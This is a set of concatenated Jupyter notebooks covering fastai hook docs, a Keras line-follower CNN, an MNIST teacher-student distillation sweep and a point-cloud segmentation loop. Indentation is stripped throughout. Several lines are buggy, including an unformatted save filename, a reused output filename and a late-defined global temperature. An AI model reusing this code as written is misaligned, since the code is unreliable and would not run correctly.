# Registers and manually deregisters a [PyTorch hook](https://pytorch.org/tutorials/beginner/former_torchies/nn_tutorial.html#forward-and-backward-function-hooks). Your `hook_func` will be called automatically when forward/backward (depending on `is_forward`) for your module `m` is run, and the result of that function is placed in `self.stored`.
# + hide_input=true
show_doc(Hook.remove)
# -
# Deregister the hook, if not called already.
# + hide_input=true
show_doc(Hooks)
# -
# Acts as a `Collection` (i.e. `len(hooks)` and `hooks[i]`) and an `Iterator` (i.e. `for hook in hooks`) of a group of hooks, one for each module in `ms`, with the ability to remove all as a group. Use `stored` to get all hook results. `hook_func` and `is_forward` behavior is the same as [`Hook`](/callbacks.hooks.html#Hook). See the source code for [`HookCallback`](/callbacks.hooks.html#HookCallback) for a simple example.
# + hide_input=true
show_doc(Hooks.remove)
# -
# Deregister all hooks created by this class, if not previously called.
# ## Convenience functions for hooks
# + hide_input=true
show_doc(hook_output)
# -
# Function that creates a [`Hook`](/callbacks.hooks.html#Hook) for `module` that simply stores the output of the layer.
# + hide_input=true
show_doc(hook_outputs)
# -
# Function that creates a [`Hook`](/callbacks.hooks.html#Hook) for all passed `modules` that simply stores the output of the layers. For example, the (slightly simplified) source code of [`model_sizes`](/callbacks.hooks.html#model_sizes) is:
#
# ```python
# def model_sizes(m, size):
# x = m(torch.zeros(1, in_channels(m), *size))
# return [o.stored.shape for o in hook_outputs(m)]
# ```
# + hide_input=true
show_doc(model_sizes)
# + hide_input=true
show_doc(num_features_model)
# -
# It can be useful to get the size of each layer of a model (e.g. for printing a summary, or for generating cross-connections for a [`DynamicUnet`](/vision.models.unet.html#DynamicUnet)), however they depend on the size of the input. This function calculates the layer sizes by passing in a minimal tensor of `size`.
# + hide_input=true
show_doc(HookCallback)
# -
# For all `modules`, uses a callback to automatically register a method `self.hook` (that you must define in an inherited class) as a hook. This method must have the signature:
#
# ```python
# def hook(self, m:Model, input:Tensors, output:Tensors)
# ```
#
# If `do_remove` then the hook is automatically deregistered at the end of training. See [`ActivationStats`](/callbacks.hooks.html#ActivationStats) for a simple example of inheriting from this class.
# ## Undocumented Methods - Methods moved below this line will intentionally be hidden
# + hide_input=true
show_doc(HookCallback.remove)
# + hide_input=true
show_doc(HookCallback.on_train_begin)
# + hide_input=true
show_doc(HookCallback.on_train_end)
# + hide_input=true
show_doc(ActivationStats.hook)
# + hide_input=true
show_doc(ActivationStats.on_batch_end)
# + hide_input=true
show_doc(ActivationStats.on_train_begin)
# + hide_input=true
show_doc(ActivationStats.on_train_end)
# -
# ## New Methods - Please document or move to the undocumented section
# + hide_input=true
show_doc(Hook.hook_fn)
# -
#
|
docs_src/callbacks.hooks.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [conda env:deepLearning]
# language: python
# name: conda-env-deepLearning-py
# ---
# # Line Follower - CompRobo17
# This notebook will show the general procedure to use our project data directories and how to do a regression task using convnets.
# ## Imports and Directories
#Create references to important directories we will use over and over
import os, sys
# +
#import modules
import numpy as np
from glob import glob
from PIL import Image
from tqdm import tqdm
from scipy.ndimage import zoom
from keras.models import Sequential
from keras.metrics import categorical_crossentropy, categorical_accuracy
from keras.layers.convolutional import *
from keras.preprocessing import image
from keras.layers.core import Flatten, Dense
from keras.optimizers import Adam
from keras.layers.normalization import BatchNormalization
from matplotlib import pyplot as plt
import seaborn as sns
# %matplotlib inline
# -
import bcolz
# Create paths to data directories
# +
DATA_HOME_DIR = '/home/nathan/olin/spring2017/line-follower/line-follower/data'
# %cd $DATA_HOME_DIR
path = DATA_HOME_DIR
train_path1=path + '/sun_apr_16_office_full_line_1'
train_path2=path + '/qea_blob_1'
valid_path1=path + '/qea-square_3'
# -
# ## Helper Functions
# Throughout the notebook, we will take advantage of helper functions to cleanly process our data.
def resize_vectorized4D(data, new_size=(64, 64)):
"""
A vectorized implementation of 4d image resizing
Args:
data (4D array): The images you want to resize
new_size (tuple): The desired image size
Returns: (4D array): The resized images
"""
fy, fx = np.asarray(new_size, np.float32) / data.shape[1:3]
return zoom(data, (1, fy, fx, 1), order=1) # order is the order of spline interpolation
def lowerHalfImage(array):
"""
Returns the lower half rows of an image
Args: array (array): the array you want to extract the lower half from
Returns: The lower half of the array
"""
return array[round(array.shape[0]/2):,:,:]
# +
def folder_to_numpy(image_directory_full):
"""
Read sorted pictures (by filename) in a folder to a numpy array.
We have hardcoded the extraction of the lower half of the images as
that is the relevant data
USAGE:
data_folder = '/train/test1'
X_train = folder_to_numpy(data_folder)
Args:
data_folder (str): The relative folder from DATA_HOME_DIR
Returns:
picture_array (np array): The numpy array in tensorflow format
"""
# change directory
print ("Moving to directory: " + image_directory_full)
os.chdir(image_directory_full)
# read in filenames from directory
g = glob('*.png')
if len(g) == 0:
g = glob('*.jpg')
print ("Found {} pictures".format(len(g)))
# sort filenames
g.sort()
# open and convert images to numpy array - then extract the lower half of each image
print("Starting pictures to numpy conversion")
picture_arrays = np.array([lowerHalfImage(np.array(Image.open(image_path))) for image_path in g])
# reshape to tensorflow format
# picture_arrays = picture_arrays.reshape(*picture_arrays.shape, 1)
print ("Shape of output: {}".format(picture_arrays.shape))
# return array
return picture_arrays
# -
def flip4DArray(array):
""" Produces the mirror images of a 4D image array """
return array[..., ::-1,:] #[:,:,::-1] also works but is 50% slower
def concatCmdVelFlip(array):
""" Concatentaes and returns Cmd Vel array """
return np.concatenate((array, array*-1)) # multiply by negative 1 for opposite turn
def save_array(fname, arr):
c=bcolz.carray(arr, rootdir=fname, mode='w')
c.flush()
def load_array(fname):
return bcolz.open(fname)[:]
# ## Data
# Because we are using a CNN and unordered pictures, we can flip our data and concatenate it onto the end of all training and validation data to make sure we don't bias left or right turns.
# ### Training Data
# Extract and store the training data in X_train and Y_train
def get_data(paths):
X_return = []
Y_return = []
for path in paths:
# %cd $path
Y_train = np.genfromtxt('cmd_vel.csv', delimiter=',')[:,1] # only use turning angle
Y_train = np.concatenate((Y_train, Y_train*-1))
X_train = folder_to_numpy(path + '/raw')
X_train = np.concatenate((X_train, flip4DArray(X_train)))
X_return.extend(X_train)
Y_return.extend(Y_train)
return np.array(X_return), np.array(Y_return)
X_train, Y_train = get_data([train_path1, train_path2])
X_train.shape
X_valid, Y_valid = get_data([valid_path1])
X_valid.shape
Y_valid.shape
# Visualize the training data. We currently use a hacky method to display the numpy matrix, as this is being run on a remote server and we can't open new windows.
# %cd /tmp
for i in range(300):
img = Image.fromarray(X_train[286+286+340+i], 'RGB')
data = np.asarray(img)[...,[2,1,0]]
img = Image.fromarray(data)
img.save("temp{}.jpg")
image.load_img("temp.jpg")
# ### Validation Data
# Follow the same steps for as the training data for the validation data.
# +
# # %cd $valid_path
# Y_valid = np.genfromtxt('cmd_vel.csv', delimiter=',')[:,1]
# Y_valid = np.concatenate((Y_valid, Y_valid*-1))
# X_valid = folder_to_numpy(valid_path + '/raw')
# X_valid = np.concatenate((X_valid, flip4DArray(X_valid)))
# -
# Test the shape of the arrays:
# X_valid: (N, 240, 640, 3)
# Y_valid: (N,)
X_valid.shape, Y_valid.shape
# ### Resize Data
# When we train the network, we don't want to be dealing with (240, 640, 3) images as they are way too big. Instead, we will resize the images to something more manageable, like (64, 64, 3) or (128, 128, 3). In terms of network predictive performance, we are not concerned with the change in aspect ratio, but we might want to test (24, 64, 3) images for faster training.
img_rows, img_cols = (64, 64)
print(img_rows)
print(img_cols)
X_train = resize_vectorized4D(X_train, (img_rows, img_cols))
X_valid = resize_vectorized4D(X_valid, (img_rows, img_cols))
print(X_train.shape)
print(X_valid.shape)
# Visualize newly resized image.
# %cd /tmp
img = Image.fromarray(X_train[np.random.randint(0, X_train.shape[0])], 'RGB')
img.save("temp.jpg")
image.load_img("temp.jpg")
# ### Batches
# `gen` allows us to normalize and augment our images. We will just use it to rescale the images.
gen = image.ImageDataGenerator(
# rescale=1. / 255 # normalize data between 0 and 1
)
# Next, create the train and valid generators; these are shuffled and have a batch size of 32 by default.
# +
train_generator = gen.flow(X_train, Y_train)#, batch_size=batch_size, shuffle=True)
valid_generator = gen.flow(X_valid, Y_valid)#, batch_size=batch_size, shuffle=True)
# get_batches(train_path, batch_size=batch_size,
# target_size=in_shape,
# gen=gen)
# val_batches = get_batches(valid_path, batch_size=batch_size,
# target_size=in_shape,
# gen=gen)
# -
data, category = next(train_generator)
print ("Shape of data: {}".format(data[0].shape))
# %cd /tmp
img = Image.fromarray(data[np.random.randint(0, data.shape[0])].astype('uint8'), 'RGB')
img.save("temp.jpg")
image.load_img("temp.jpg")
# ## Convnet
# ### Constants
in_shape = (img_rows, img_cols, 3)
# ### Model
# Our test model will use a VGG-like structure with a few changes. We are removing the final activation function. We will also use either mean_absolute_error or mean_squared_error as our loss function for regression purposes.
def get_model():
model = Sequential([
Convolution2D(32,3,3, border_mode='same', activation='relu', input_shape=in_shape),
MaxPooling2D(),
Convolution2D(64,3,3, border_mode='same', activation='relu'),
MaxPooling2D(),
Convolution2D(128,3,3, border_mode='same', activation='relu'),
MaxPooling2D(),
Flatten(),
Dense(2048, activation='relu'),
Dense(1024, activation='relu'),
Dense(512, activation='relu'),
Dense(1)
])
model.compile(loss='mean_absolute_error', optimizer='adam')
return model
model = get_model()
model.summary()
# ### Train
history = model.fit_generator(train_generator,
samples_per_epoch=train_generator.n,
nb_epoch=5,
validation_data=valid_generator,
nb_val_samples=valid_generator.n,
verbose=True)
# +
# # %cd $DATA_HOME_DIR
# model.save_weights('epoche_QEA_carpet_425.h5')
# +
# # %cd $DATA_HOME_DIR
# model.save_weights('epoche_2500.h5')
# -
# %cd $DATA_HOME_DIR
model.load_weights('epoche_QEA_carpet_425.h5')
len(model.layers)
model.pop()
len(model.layers)
model.compile(loss='mean_absolute_error', optimizer='adam')
model.summary()
X_train_features = model.predict(X_train)
X_valid_features = model.predict(X_valid)
for x,y in zip(Y_valid, X_valid_features):
print (x, y[0])
# %cd $train_path2
save_array("X_train_features3.b", X_train_features)
# %cd $valid_path1
save_array("X_train_features3.b", X_valid_features)  # note: same filename, but saved under valid_path1
X_train_features[9]
def get_model_lstm():
    # NOTE: despite the name, this is identical to get_model() above; no recurrent layers yet
    model = Sequential([
Convolution2D(32,3,3, border_mode='same', activation='relu', input_shape=in_shape),
MaxPooling2D(),
Convolution2D(64,3,3, border_mode='same', activation='relu'),
MaxPooling2D(),
Convolution2D(128,3,3, border_mode='same', activation='relu'),
MaxPooling2D(),
Flatten(),
Dense(2048, activation='relu'),
Dense(1024, activation='relu'),
Dense(512, activation='relu'),
Dense(1)
])
model.compile(loss='mean_absolute_error', optimizer='adam')
return model
X_train.shape
# + [markdown] heading_collapsed=true
# ### Visualize Training
# + hidden=true
val_plot = np.convolve(history.history['val_loss'], np.repeat(1/10, 10), mode='valid')
train_plot = np.convolve(history.history['loss'], np.repeat(1/10, 10), mode='valid')
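# The smoothing above is just a length-10 moving average; a tiny self-contained illustration of the same np.convolve call:

```python
import numpy as np

# A short, noisy "loss curve"
loss_curve = np.array([5, 4, 6, 3, 4, 2, 3, 1, 2, 1, 2, 1], dtype=float)
# Averaging kernel of ten equal weights; mode='valid' drops the edges
smooth = np.convolve(loss_curve, np.repeat(1/10, 10), mode='valid')
print(smooth)  # [3.1 2.8 2.5]
```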
# + hidden=true
sns.tsplot(val_plot)
# + hidden=true
X_preds = model.predict(X_valid).reshape(X_valid.shape[0],)
for i in range(len(X_valid)):
print("{:07f} | {:07f}".format(Y_valid[i], X_preds[i]))
# + hidden=true
X_train_preds = model.predict(X_train).reshape(X_train.shape[0],)
for i in range(len(X_train_preds)):
print("{:07f} | {:07f}".format(Y_train[i], X_train_preds[i]))
# + [markdown] hidden=true
# Notes
# * 32 by 32 images are too small resolution for regression
# * 64 by 64 seemed to work really well
# * Moving average plot to see val_loss over time is really nice
# * Can take up to 2000 epochs to reach a nice minimum
# + hidden=true
X_preds.shape
# + hidden=true
X_train_preds.shape
# + hidden=true
np.savetxt("X_train_valid.csv", X_preds, fmt='%.18e', delimiter=',', newline='\n')
np.savetxt("X_train_preds.csv", X_train_preds, fmt='%.18e', delimiter=',', newline='\n')
# + hidden=true
|
line-follower/src/v1/convnet_regression_circle_and_carpet.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# # lambda * loss1 + (1 - lambda) * loss2
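# The weighted loss in this title can be sketched in plain numpy (illustrative only, not the Estimator code below): the student's hard cross-entropy against the true label is blended with a soft cross-entropy against the teacher's temperature-softened probabilities. The usual T**2 scaling of the soft term is omitted for simplicity.

```python
import numpy as np

def softmax(z, T=1.0):
    # Temperature-scaled, numerically stable softmax
    e = np.exp(z / T - np.max(z / T))
    return e / e.sum()

def distill_loss(label, student_logits, teacher_logits, lam, T):
    hard = -np.log(softmax(student_logits)[label])  # loss1: CE vs true label
    soft = -(softmax(teacher_logits, T) * np.log(softmax(student_logits, T))).sum()  # loss2: CE vs teacher
    return lam * hard + (1 - lam) * soft

student = np.array([2.0, 0.5, -1.0])
teacher = np.array([3.0, 0.0, -2.0])
print(distill_loss(1, student, teacher, 0.5, 2.0))
```

# With lam=1 the soft term drops out and the loss reduces to ordinary cross-entropy against the label.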
# +
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
tf.logging.set_verbosity(tf.logging.INFO)
def cnn_model_fn(features, labels, mode):
"""Model function for CNN."""
# Input Layer
# Reshape X to 4-D tensor: [batch_size, width, height, channels]
# MNIST images are 28x28 pixels, and have one color channel
input_layer = tf.reshape(features["x"], [-1, 28, 28, 1])
print("_THIS_",type(features))
# Convolutional Layer #1
# Computes 32 features using a 5x5 filter with ReLU activation.
# Padding is added to preserve width and height.
# Input Tensor Shape: [batch_size, 28, 28, 1]
# Output Tensor Shape: [batch_size, 28, 28, 32]
conv1 = tf.layers.conv2d(
inputs=input_layer,
filters=32,
kernel_size=[5, 5],
padding="same",
activation=tf.nn.relu)
# Pooling Layer #1
# First max pooling layer with a 2x2 filter and stride of 2
# Input Tensor Shape: [batch_size, 28, 28, 32]
# Output Tensor Shape: [batch_size, 14, 14, 32]
pool1 = tf.layers.max_pooling2d(inputs=conv1, pool_size=[2, 2], strides=2)
# Convolutional Layer #2
# Computes 64 features using a 5x5 filter.
# Padding is added to preserve width and height.
# Input Tensor Shape: [batch_size, 14, 14, 32]
# Output Tensor Shape: [batch_size, 14, 14, 64]
conv2 = tf.layers.conv2d(
inputs=pool1,
filters=64,
kernel_size=[5, 5],
padding="same",
activation=tf.nn.relu)
# Pooling Layer #2
# Second max pooling layer with a 2x2 filter and stride of 2
# Input Tensor Shape: [batch_size, 14, 14, 64]
# Output Tensor Shape: [batch_size, 7, 7, 64]
pool2 = tf.layers.max_pooling2d(inputs=conv2, pool_size=[2, 2], strides=2)
# Flatten tensor into a batch of vectors
# Input Tensor Shape: [batch_size, 7, 7, 64]
# Output Tensor Shape: [batch_size, 7 * 7 * 64]
pool2_flat = tf.reshape(pool2, [-1, 7 * 7 * 64])
# Dense Layer
# Densely connected layer with 1024 neurons
# Input Tensor Shape: [batch_size, 7 * 7 * 64]
# Output Tensor Shape: [batch_size, 1024]
dense = tf.layers.dense(inputs=pool2_flat, units=1024, activation=tf.nn.relu)
# Add dropout operation; 0.6 probability that element will be kept
dropout = tf.layers.dropout(
inputs=dense, rate=0.4, training=mode == tf.estimator.ModeKeys.TRAIN)
# Logits layer
# Input Tensor Shape: [batch_size, 1024]
# Output Tensor Shape: [batch_size, 10]
logits = tf.layers.dense(inputs=dropout, units=10)
predictions = {
# Generate predictions (for PREDICT and EVAL mode)
"classes": tf.argmax(input=logits, axis=1),
# Add `softmax_tensor` to the graph. It is used for PREDICT and by the
# `logging_hook`.
"probabilities": tf.nn.softmax(logits/temprature, name="softmax_tensor")
}
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions)
# Calculate Loss (for both TRAIN and EVAL modes)
loss = tf.losses.sparse_softmax_cross_entropy(labels=labels, logits=logits)
# Configure the Training Op (for TRAIN mode)
if mode == tf.estimator.ModeKeys.TRAIN:
optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.001)
train_op = optimizer.minimize(
loss=loss,
global_step=tf.train.get_global_step())
return tf.estimator.EstimatorSpec(mode=mode, loss=loss, train_op=train_op)
# Add evaluation metrics (for EVAL mode)
eval_metric_ops = {
"accuracy": tf.metrics.accuracy(
labels=labels, predictions=predictions["classes"]),
}
return tf.estimator.EstimatorSpec(
mode=mode, loss=loss, eval_metric_ops=eval_metric_ops)
# +
# Cross entropy between teacher soft targets and student logits, with temperature applied.
# Returns the mean loss over the batch (a scalar, via tf.reduce_mean below).
def cross_entropy2(tar_soft_t, pred_logits):
pred_soft_t = tf.nn.softmax(pred_logits/temprature)
# tar_soft = tf.nn.softmax(tar_logits_t/temprature)
pred_log = -1 * tf.log(pred_soft_t)
    product = tf.multiply(tar_soft_t, pred_log)
# print("Swapnil", pred_log,tar_soft_t,product)
return tf.reduce_mean(product)
def custom_loss(y_true, pred_logits, tar_soft_t):
# print(tf.losses.sparse_softmax_cross_entropy(labels = y_true, logits = pred_logits))
# print(l * cross_entropy2(tar_soft_t, pred_logits_t))
# return loss_weight * tf.losses.sparse_softmax_cross_entropy(labels = y_true, logits = pred_logits) + (1-loss_weight) * cross_entropy2(tar_soft_t, pred_logits_t)
return loss_weight * tf.losses.sparse_softmax_cross_entropy(labels = y_true, logits = pred_logits)+(1-loss_weight)*cross_entropy2(tar_soft_t,pred_logits)
# one_hot=tf.one_hot(y_true,10)
# sess2=tf.InteractiveSession()
# tf.train.start_queue_runners(sess2)
# print("S_",tar_soft_t.eval())
# print("T_",pred_soft_t.eval())
# sess2.close()
# return tf.losses.mean_squared_error(labels=tar_soft_t,predictions=pred_soft_t)
# +
def getFilterData(f,l):
sess=tf.InteractiveSession()
tf.train.start_queue_runners(sess)
data_s=f['x'].eval()
out_s=l.eval()
sess.close()
return data_s,out_s
def student_model_fn(features, labels, mode):
print(features,labels)
data_swap,out_swap=getFilterData(features,labels)
# Input Layer
# Reshape X to 4-D tensor: [batch_size, width, height, channels]
# MNIST images are 28x28 pixels, and have one color channel
input_layer = tf.reshape(features["x"], [-1, 28, 28, 1])
    # Convolutional Layer #1
    # Computes 8 features using a 5x5 filter with ReLU activation.
    # Padding is added to preserve width and height.
    # Input Tensor Shape: [batch_size, 28, 28, 1]
    # Output Tensor Shape: [batch_size, 28, 28, 8]
if mode == tf.estimator.ModeKeys.TRAIN:
eval_teacher_fn = tf.estimator.inputs.numpy_input_fn(
x={"x":data_swap},
y=out_swap,
batch_size=100,
shuffle=False)
eval_teacher=mnist_classifier.evaluate(input_fn=eval_teacher_fn)
outlog.write('%f;' % eval_teacher['accuracy'])
outlog.write('%f;' % eval_teacher['loss'])
outlog.write('\n')
predictions=mnist_classifier.predict(input_fn=eval_teacher_fn)
teacher_pred=list(predictions)
teacher_soft=[ p['probabilities'] for p in teacher_pred]
temp=np.array(teacher_soft)
teacher_soft_t=tf.convert_to_tensor(temp)
conv1 = tf.layers.conv2d(
inputs=input_layer,
filters=8,
kernel_size=[5, 5],
padding="same",
activation=tf.nn.relu)
    # Pooling Layer #1
    # First max pooling layer with a 2x2 filter and stride of 2
    # Input Tensor Shape: [batch_size, 28, 28, 8]
    # Output Tensor Shape: [batch_size, 14, 14, 8]
pool1 = tf.layers.max_pooling2d(inputs=conv1, pool_size=[2, 2], strides=2)
    # Convolutional Layer #2
    # Computes 8 features using a 5x5 filter.
    # Padding is added to preserve width and height.
    # Input Tensor Shape: [batch_size, 14, 14, 8]
    # Output Tensor Shape: [batch_size, 14, 14, 8]
conv2 = tf.layers.conv2d(
inputs=pool1,
filters=8,
kernel_size=[5, 5],
padding="same",
activation=tf.nn.relu)
    # Pooling Layer #2
    # Second max pooling layer with a 2x2 filter and stride of 2
    # Input Tensor Shape: [batch_size, 14, 14, 8]
    # Output Tensor Shape: [batch_size, 7, 7, 8]
pool2 = tf.layers.max_pooling2d(inputs=conv2, pool_size=[2, 2], strides=2)
    # Flatten tensor into a batch of vectors
    # Input Tensor Shape: [batch_size, 7, 7, 8]
    # Output Tensor Shape: [batch_size, 7 * 7 * 8]
pool2_flat = tf.reshape(pool2, [-1, 7 * 7 * 8])
    # Dense Layer
    # Densely connected layer with 256 neurons
    # Input Tensor Shape: [batch_size, 7 * 7 * 8]
    # Output Tensor Shape: [batch_size, 256]
dense = tf.layers.dense(inputs=pool2_flat, units=256, activation=tf.nn.relu)
# Add dropout operation; 0.6 probability that element will be kept
dropout = tf.layers.dropout(
inputs=dense, rate=0.4, training=mode == tf.estimator.ModeKeys.TRAIN)
    # Logits layer
    # Input Tensor Shape: [batch_size, 256]
    # Output Tensor Shape: [batch_size, 10]
logits = tf.layers.dense(inputs=dropout, units=10)
predictions = {
# Generate predictions (for PREDICT and EVAL mode)
"classes": tf.argmax(input=logits, axis=1),
# Add `softmax_tensor` to the graph. It is used for PREDICT and by the
# `logging_hook`.
"probabilities": tf.nn.softmax(logits, name="softmax_tensor")
}
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions)
# Calculate Loss (for both TRAIN and EVAL modes)
# loss = tf.losses.sparse_softmax_cross_entropy(labels=labels, logits=logits)
# student_pred=predictions['probabilities']
# sess1=tf.InteractiveSession()
# tf.train.start_queue_runners(sess1)
# student_soft=student_pred.eval()
# sess1.close()
if mode == tf.estimator.ModeKeys.TRAIN:
# pred_soft_t=tf.nn.softmax(logits, name="softmax_tensor")
# print('a',labels,'b', logits,'c', teacher_soft_t ,'d', pred_logits_t)
loss=custom_loss(labels, logits,teacher_soft_t)
else:
loss = tf.losses.sparse_softmax_cross_entropy(labels=labels, logits=logits)
# Configure the Training Op (for TRAIN mode)
if mode == tf.estimator.ModeKeys.TRAIN:
optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.001)
train_op = optimizer.minimize(
loss=loss,
global_step=tf.train.get_global_step())
return tf.estimator.EstimatorSpec(mode=mode, loss=loss, train_op=train_op)
# Add evaluation metrics (for EVAL mode)
eval_metric_ops = {
"accuracy": tf.metrics.accuracy(
labels=labels, predictions=predictions["classes"]),
}
return tf.estimator.EstimatorSpec(
mode=mode, loss=loss, eval_metric_ops=eval_metric_ops)
# +
mnist_classifier = tf.estimator.Estimator(
model_fn=cnn_model_fn, model_dir="./models/mnist_convnet_model_test1")
mnist = tf.contrib.learn.datasets.load_dataset("mnist")
train_data = mnist.train.images # Returns np.array
train_labels = np.asarray(mnist.train.labels, dtype=np.int32)
eval_data = mnist.test.images # Returns np.array
eval_labels = np.asarray(mnist.test.labels, dtype=np.int32)
temp_list=[1,2,5,10]
loss_weight_list=[0,0.25,0.5,0.75,1]
p=-1
l=-1
def getdatap():
global p
p += 1
    if p >= len(train_labels) // 100:
p=0
data=train_data[p*100:(p+1)*100]
labels=train_labels[p*100:(p+1)*100]
datatensor=tf.convert_to_tensor(data)
labeltensor=tf.convert_to_tensor(labels)
return {'x':datatensor},labeltensor
out = open('swapout4.csv', 'w')
outlog = open('out_log.csv', 'w')
for i in temp_list:
for j in loss_weight_list:
temprature=i
loss_weight=j
# Create the Estimator
student_classifier = tf.estimator.Estimator(
model_fn=student_model_fn, model_dir="./models/mnist_convnet_student_mod_t_"+str(i)+"_w_"+str(j))
# eval_train_fn = tf.estimator.inputs.numpy_input_fn(
# x={"x": train_data[:100]},
# y=train_labels[:100],
# num_epochs=1,
# batch_size=100,
# shuffle=False)
# train_result=mnist_classifier.evaluate(input_fn=eval_train_fn)
# #print("\n \n \n Train 100",train_result)
# print("\n\n\nLABEL FUNCTION",train_labels[:100])
# print("\n\n\nTRAIN DATA FUNCTION",train_data[0])
# Train the model
# train_input_fn = tf.estimator.inputs.numpy_input_fn(
# x={"x": train_data},
# y=train_labels,
# batch_size=100,
# num_epochs=None,
# shuffle=True)
# print(train_data,train_labels,eval_data,eval_labels)
student_classifier.train(
input_fn=getdatap,
steps=5000,
hooks=None)
# print("eva",type(eval_data))
# Evaluate the model and print results
eval_train_fn = tf.estimator.inputs.numpy_input_fn(
x={"x": train_data},
y=train_labels,
shuffle=False)
train_result=student_classifier.evaluate(input_fn=eval_train_fn)
out.write('%f;' % i)
out.write('%f;' % j)
out.write('%f;' % train_result['accuracy'])
out.write('%f;' % train_result['loss'])
eval_input_fn = tf.estimator.inputs.numpy_input_fn(
x={"x": eval_data},
y=eval_labels,
num_epochs=1,
shuffle=False)
eval_result=student_classifier.evaluate(input_fn=eval_input_fn)
# output=list(predictions)
out.write('%f;' % eval_result['accuracy'])
out.write('%f;' % eval_result['loss'])
# acc=eval_result
# out.write(eval_result)
out.write('\n')
out.close()
outlog.close()
# -
eval_input_fn = tf.estimator.inputs.numpy_input_fn(
x={"x": eval_data},
y=eval_labels,
shuffle=False)
eval_result=student_classifier.evaluate(input_fn=eval_input_fn)
# # loss1 + lambda * loss2
# +
def custom_loss(y_true, pred_logits, tar_soft_t):
    # print(tf.losses.sparse_softmax_cross_entropy(labels = y_true, logits = pred_logits))
    # print(lam * cross_entropy2(tar_soft_t, pred_logits))
    return tf.losses.sparse_softmax_cross_entropy(labels = y_true, logits = pred_logits) + lam * cross_entropy2(tar_soft_t, pred_logits)
mnist_classifier = tf.estimator.Estimator(
model_fn=cnn_model_fn, model_dir="./models/mnist_convnet_model_test1")
mnist = tf.contrib.learn.datasets.load_dataset("mnist")
train_data = mnist.train.images # Returns np.array
train_labels = np.asarray(mnist.train.labels, dtype=np.int32)
eval_data = mnist.test.images # Returns np.array
eval_labels = np.asarray(mnist.test.labels, dtype=np.int32)
lam_list=[0,1,2,4,6,8,9,10]
temprature=2
out = open('out_lam.csv', 'w')
for i in lam_list:
lam=i
# Create the Estimator
student_classifier = tf.estimator.Estimator(
model_fn=student_model_fn, model_dir="./models/mnist_convnet_student_t_"+str(2)+"_lam_"+str(i))
# Train the model
train_input_fn = tf.estimator.inputs.numpy_input_fn(
x={"x": train_data},
y=train_labels,
batch_size=100,
num_epochs=None,
shuffle=True)
print(train_data,train_labels,eval_data,eval_labels)
student_classifier.train(
input_fn=train_input_fn,
steps=20000,
hooks=None)
# print("eva",type(eval_data))
# Evaluate the model and print results
eval_train_fn = tf.estimator.inputs.numpy_input_fn(
x={"x": train_data},
y=train_labels,
num_epochs=1,
shuffle=False)
train_result=student_classifier.evaluate(input_fn=eval_train_fn)
out.write('%f;' % i)
    out.write('%f;' % temprature)  # temperature is fixed for this sweep
out.write('%f;' % train_result['accuracy'])
out.write('%f;' % train_result['loss'])
eval_input_fn = tf.estimator.inputs.numpy_input_fn(
x={"x": eval_data},
y=eval_labels,
num_epochs=1,
shuffle=False)
eval_result=student_classifier.evaluate(input_fn=eval_input_fn)
# output=list(predictions)
out.write('%f;' % eval_result['accuracy'])
out.write('%f;' % eval_result['loss'])
# acc=eval_result
# out.write(eval_result)
out.write('\n')
out.close()
# -
eval_input_fn = tf.estimator.inputs.numpy_input_fn(
x={"x": train_data},
y=train_labels,
batch_size=100,
num_epochs=10,
shuffle=False)
eval_result=mnist_classifier.evaluate(input_fn=eval_input_fn)
|
One_Student_Temp_Loss_Weight.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
for i in range(0,len(Extraction_folder)):
# Export clouds in .asc
commande = cc.open_file(commande1,shift,workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+list(Extraction_filenames.values())[i]+'.las')
cc.connected_component(commande,octree_level,min_point_per_component)
# Export clouds in .las
commande = cc.open_file(commande0,shift,workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+list(Extraction_filenames.values())[i]+'.las')
cc.connected_component(commande,octree_level,min_point_per_component)
# Count the number of segmented clouds
number_of_outputs = int(sum(len(files) for _, _, files in os.walk(workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]))/2)
# Rename the segmented cloud in function of their number
for ii in range(1,number_of_outputs+1):
os.rename(workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+list(Extraction_filenames.values())[i]+'_COMPONENT_'+str(ii)+'.asc',workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+str(ii-1)+'.csv')
os.rename(workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+list(Extraction_filenames.values())[i]+'_COMPONENT_'+str(ii)+'.las',workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+str(ii-1)+'.las')
# Sort them from the biggest to the smallest
nb_points = []
for iii in range(0,number_of_outputs):
file=pd.read_csv(workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+str(iii)+'.csv',sep=' ',header=None)
nb_points = np.append(nb_points,file.shape[0])
dataframe = pd.DataFrame({'Points':nb_points,})
dataframe= dataframe.sort_values(by=['Points'],ascending=False)
index_values=dataframe.index.values
# Create individual clouds folder
individual_clouds_folder = workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+list(individual_outputs_folder.values())[i]
os.makedirs(individual_clouds_folder)
count = 0
for iii in index_values:
os.rename(workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+str(iii)+'.las',workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+list(individual_outputs_folder.values())[i]+str(count)+'.las')
count = count + 1
for iv in range(0,number_of_outputs):
os.remove(workspace+workflow_folder+segmentation_folder+list(Extraction_folder.values())[i]+str(iv)+'.csv')
